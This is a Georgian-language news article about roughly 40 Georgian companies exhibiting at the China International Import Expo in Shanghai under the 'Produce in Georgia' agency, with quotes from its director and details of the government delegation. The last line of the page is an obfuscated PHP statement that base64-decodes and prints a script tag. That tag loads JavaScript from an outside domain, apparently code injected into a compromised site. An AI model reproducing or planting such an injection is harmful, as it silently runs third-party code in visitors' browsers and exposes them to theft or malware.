celsiusi
ავერსი შნაიდერი

ჩინეთის სახალხო რესპუბლიკაში, ქალაქ შანხაიში საერთაშორისო იმპორტის უმსხვილესი გამოფენა - China International Import Expo (CIIE) გაიხსნა.

საქართველოს ეკონომიკისა და მდგრადი განვითარების სამინისტროს სააგენტოს „აწარმოე საქართველოში“ ორგანიზებით, 40-მდე ქართული კომპანია ორ მასშტაბურ პავილიონშია წარმოდგენილი - საკვებისა და სასმელის, ასევე საფეიქრო ინდუსტრიის პავილიონებში. აქ გამოფენის სტუმრებს ქართული ღვინო, ალკოჰოლური და არაალკოჰოლური სასმელები, აგროპროდუქტი, ტყავის ნაწარმი და აქსესუარები, ასევე ტანსაცმელი დახვდებათ.

“აწარმოე საქართველოში” დირექტორის, მიხეილ ხიდურელის თქმით, უმსხვილეს გამოფენაში მონაწილეობა სააგენტოს ბენეფიციარებს საშუალებას აძლევს, მნიშვნელოვანი ბიზნესკავშირები დაამყარონ საერთაშორისო კომპანიებთან.

“ჩვენი სააგენტოს ორგანიზებით, ჩინეთში საერთაშორისო იმპორტის გამოფენაში 40-მდე კომპანიით ვმონაწილეობთ 15 სხვადასხვა კატეგორიაში. აღსანიშნავია რომ, მოლაპარაკებების შედეგად, წლევანდელ ექსპოზე გავზარდეთ გამოფენის სივრცე, რაც იმას ნიშნავს, რომ უფრო მეტი ქართველი ექსპორტიორი წარადგენს საკუთარ პროდუქციას ამ ღონისძიებაზე.

“აწარმოე საქართველოში” ყოველწლიურად, გამოფენების შემდეგ აჯამებს, თუ რა შედეგი ექნება კონკრეტულ გამოფენას კონკრეტული ექსპორტიორებისთვის და უნდა აღინიშნოს, რომ შანხაის ექსპო ერთ-ერთი ყველაზე შედეგიანია ამ მხრივ. იცით, რომ ჩინეთთან თავისუფალი ვაჭრობის შეთანხმება გვაქვს, ჩვენი პოლიტიკურ-ეკონომიკური ურთიერთობები უფრო მაღალ ეტაპზე გადავიდა და უკვე სტრატეგიული პარტნიორობა გვაქვს ჩინეთთან და ეს ყველაფერი ქართულმა კომპანიებმა უნდა გამოიყენონ.

ვიმედოვნებთ, ამ დღეების განმავლობაში ქართველი ექსპორტიორები მნიშვნელოვან შედეგებს მიიღებენ, გაზრდიან გაყიდვებს“ - განაცხადა გამოფენის გახსნაზე სააგენტოს დირექტორმა მიხეილ ხიდურელმა.

შანხაიში საქართველოს დელეგაციას სოფლის მეურნეობის მინისტრი ოთარ შამუგია ხელმძღვანელობს, რომელმაც ეკონომიკის მინისტრის მოადგილეებთან - ირაკლი ნადარეიშვილთან და გენადი არველაძესთან, ასევე საქართველოს საგანგებო და სრულუფლებიან ელჩთან ჩინეთის სახალხო რესპუბლიკაში, არჩილ კალანდიასთან ერთად, ქართული პავილიონები დაათვალიერა და მეწარმეებს გაესაუბრა.

ქართული ბიზნესის პავილიონების პარალელურად, საქართველოს ტურისტულ და საინვესტიციო პოტენციალს გამოფენის დამთვალიერებლები კიდევ ერთ პავილიონში გაეცნობიან. ეროვნულ პავილიონში წარმოდგენილია სხვადასხვა სახელმწიფო უწყების საინფორმაციო სტენდი, მათ შორის: საქართველოს ინოვაციებისა და ტექნოლოგიების სააგენტო, ტურიზმის ეროვნული ადმინისტრაცია, ღვინის ეროვნული სააგენტო, მთის ტრასების სააგენტო და საქართველოს რკინიგზა.

ეროვნულ პავილიონში სტუმრებს ვიდეორგოლებით და საინფორმაციო ბუკლეტებით, საქართველოს ტურისტულ, საინვესტიციო, სატრანსპორტო პოტენციალზე მოუყვებიან.

CIIE 10 ნოემბრამდე გაგრძელდება და მასში მონაწილეობას 160 ქვეყნის ბიზნეს და სამთავრობო დელეგაცია მიიღებს. გამოფენის ვიზიტორების რაოდენობა წელს სავარაუდოდ, 500 000-ს მიაღწევს. „აწარმოე საქართველოში“ მხარდაჭერით, ქართული კომპანიები გამოფენაში 2018 წლიდან მონაწილეობენ.

212
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");